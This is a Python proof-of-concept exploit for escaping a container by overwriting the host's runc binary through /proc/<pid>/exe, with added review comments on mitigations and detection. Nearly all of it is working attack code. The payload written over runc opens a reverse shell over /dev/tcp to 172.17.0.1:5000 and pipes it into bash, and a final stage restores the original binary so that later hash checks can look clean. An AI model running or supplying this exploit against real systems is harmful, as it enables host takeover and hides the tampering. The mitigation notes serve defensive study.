#!/bin/python3
import os
import stat
import time
# Proof-of-concept for overwriting the container runtime binary (runc) from
# inside a container by way of /proc/<pid>/exe. The stages are: drop a trigger
# file, wait for a runc process to become visible, take a read handle on its
# executable, back the bytes up, overwrite the file, then restore it.
#
# NOTE(review): every stage depends on the in-container process being able to
# open the host's runc binary for writing. Mitigations to confirm for a given
# deployment: a runc build that re-executes itself from a sealed in-memory
# copy instead of the on-disk binary, not mapping host root into the container
# (user namespaces), and keeping the runtime binary on a read-only filesystem.

# Address the replacement script connects back to. 172.17.0.1 is presumably
# the default Docker bridge gateway, i.e. the container host — confirm.
host='172.17.0.1'
port='5000'
# Text written over the runc binary: a bash script that opens a TCP connection
# to host:port on fd 5 and feeds what it receives to /bin/bash, with stdout and
# stderr sent back over the same socket.
payload=f'#!/bin/bash\necho "exec 5<>/dev/tcp/{host}/{port} && cat <&5|/bin/bash 2>&5 >&5"|/bin/bash\n'
# Trigger file. This script only creates it; whatever executes it is outside
# this file.
target_file='/tmp/evil'
if __name__ == '__main__':
    # The file's only content is a shebang naming /proc/self/exe, so executing
    # it makes the kernel run the caller's own binary as the interpreter.
    # Presumably the intent is that a runc exec of this path leaves a runc
    # process running inside the container's PID namespace — verify.
    with open(target_file,'w') as evil:
        evil.write('#!/proc/self/exe --criu')
    # os.chmod replaces the whole mode, so the file ends up 0o001
    # (execute for "other" only).
    os.chmod(target_file,stat.S_IXOTH)
    # Stage 1: busy-poll the process table until some process newer than this
    # one has 'runc' in its command line.
    # NOTE(review): each pass spawns `ps` and the popen handle is never
    # closed; a tight stream of `ps -A -o pid` from one container is a usable
    # detection signal.
    found = 0
    while found == 0:
        procs = os.popen('ps -A -o pid')
        for pid in procs:
            pid = pid.strip()
            # Skip the column header printed by ps.
            if pid == 'PID': continue
            # Only PIDs above our own are examined, presumably to restrict
            # the search to processes started after this script — confirm.
            if int(pid) > os.getpid():
                try:
                    with open(f'/proc/{pid}/cmdline','r') as cmdline:
                        if cmdline.read().find('runc') >= 0:
                            # No break follows, so the last match in this
                            # pass wins; `found` holds the PID as a string.
                            found = pid
                # The process may exit between the ps listing and the open.
                except FileNotFoundError:
                    continue
                except ProcessLookupError:
                    continue
    # Stage 2: retry until a read-only descriptor on the matched process's
    # executable can be opened.
    read_handle = -1;
    while read_handle == -1:
        try:
            read_handle = os.open(f'/proc/{found}/exe', os.O_RDONLY) # /proc/<pid>/exe refers to the binary that process runs ("runc init" per the original author)
        except OSError:
            continue
        # FileNotFoundError and PermissionError are subclasses of OSError, so
        # the two handlers below are never reached.
        except FileNotFoundError:
            continue
        except PermissionError:
            continue
    print('Got read handle')
    # Stage 3: keep a copy of the original binary in memory for the later
    # restore. 10934200 is the per-read size cap; the loop runs to EOF anyway.
    runc = b''
    byte = os.read(read_handle,10934200)
    while byte != b'':
        runc += byte
        byte = os.read(read_handle,10934200)
    print('Read runc')
    # Stage 4: reopen the same file for writing through this process's own fd
    # link, truncating it. The retry on OSError is presumably waiting out
    # "text file busy" while the binary is still being executed — confirm.
    write_handle = -1;
    while write_handle == -1:
        try:
            write_handle = os.open(f'/proc/self/fd/{str(read_handle)}',os.O_WRONLY|os.O_TRUNC)
        except OSError:
            continue
    print('Got write handle')
    # os.write returns a byte count while len(payload) counts characters; the
    # two agree here only because the payload is ASCII.
    result = os.write(write_handle,str.encode(payload))
    if result == len(payload):
        print('Successfully wrote payload')
    else:
        print('Could not write')
    os.close(write_handle)
    # Leave the replaced file in place for one second before putting the
    # original bytes back.
    time.sleep(1)
    # Stage 5: same reopen-and-truncate loop, this time to restore the backup.
    # NOTE(review): because the original bytes are written back, a later hash
    # comparison of the runtime binary can look clean. Real-time write/open
    # auditing on the runc path and the file's changed timestamps are the more
    # reliable evidence — confirm what the host's monitoring records.
    write_handle = -1;
    while write_handle == -1:
        try:
            write_handle = os.open(f'/proc/self/fd/{str(read_handle)}',os.O_WRONLY|os.O_TRUNC)
        except OSError:
            continue
    print('Got write handle again')
    result = os.write(write_handle,runc)
    if result == len(runc):
        print('Successfully restored runc')
    else:
        print('Could not write')
    os.close(write_handle)
    os.close(read_handle)